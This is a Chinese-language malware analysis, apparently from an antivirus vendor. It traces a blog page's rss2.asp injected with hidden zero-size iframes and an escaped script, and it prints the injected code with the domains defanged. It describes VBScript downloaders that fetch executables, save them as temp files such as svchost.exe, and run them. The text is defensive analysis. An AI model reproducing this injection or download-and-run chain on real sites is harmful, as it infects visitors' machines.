该博客网的rss2.asp包含代码:
/--- <SCRIPT>var Words="%*3*Cht*ml%3E%3Ciframe src%3D%22hxxp%3A%2F%2Fkmx%2E**zl**f*j**j%2Ecom%2Findex%2Ehtm%22 name%3D%22zhu%22 width%3D%220%22 height%3D%220%22 frameborder%3D%220%22%3E%3C%2Fhtml%3E%0D%0A%0D%0A%0D%0A";document.write(unescape(Words))</SCRIPT> <Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe> <Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe><Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe> <Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe> ---/ 变量Words的值解密后的内容为: /--- <html><iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"></html> ";document.write(unescape(Words))</SCRIPT> <SCRIPT>var Words="<html><iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"></html> ---/ hxxp://k***m**x*.z***l*f**j*j.com/index.htm包含代码: /--- <iframe src="hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm" width="0" height="0" frameborder="0"></iframe> <iframe src="hxxp://k***m**x*.z***l*f**j*j.com/jb.htm" width="0" height="0" frameborder="0"></iframe> <iframe src="hxxp://www.z***l*f**j*j.com/321.htm" width="0" height="0" frameborder="0"></iframe> <iframe src="hxxp://www.z***l*f**j*j.com/123.htm" width="0" height="0" frameborder="0"></iframe> ---/
hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm中的脚本代码功能是用unescape()解码字符串值并输出。
输出内容为VBScript脚本,功能是使用自定义函数:
/--- function rechange(k) s=Split(k,",") t="" For i = 0 To UBound(s) t=t+Chr(eval(s(i))) Next rechange=t End Function ---/
解密变量t的值并执行。
解密后的变量t值为VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 gz.exe,保存为 %temp%/leren.bat,并利用Shell.Application 对象 Q 的 ShellExecute 方法来运行。
文件说明符 : D:/test/gz.exe属性 : A---
获取文件版本信息大小失败!
我们将在较新的19.16.42版本(瑞星2006的18.72.42版本)中处理解决,请您届时将您的瑞星软件升级到19.16.42(瑞星2006的18.72.42版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话,我们会推迟一到两版本后升级。
hxxp://k***m**x*.z***l*f**j*j.com/jb.htm(卡巴报为:Trojan-Downloader.VBS.Small.dc)内容为VBScript脚本代码,功能是输出信息:“你好,您所访问的页面正在加载中...请稍候片刻....”,同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 jb.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。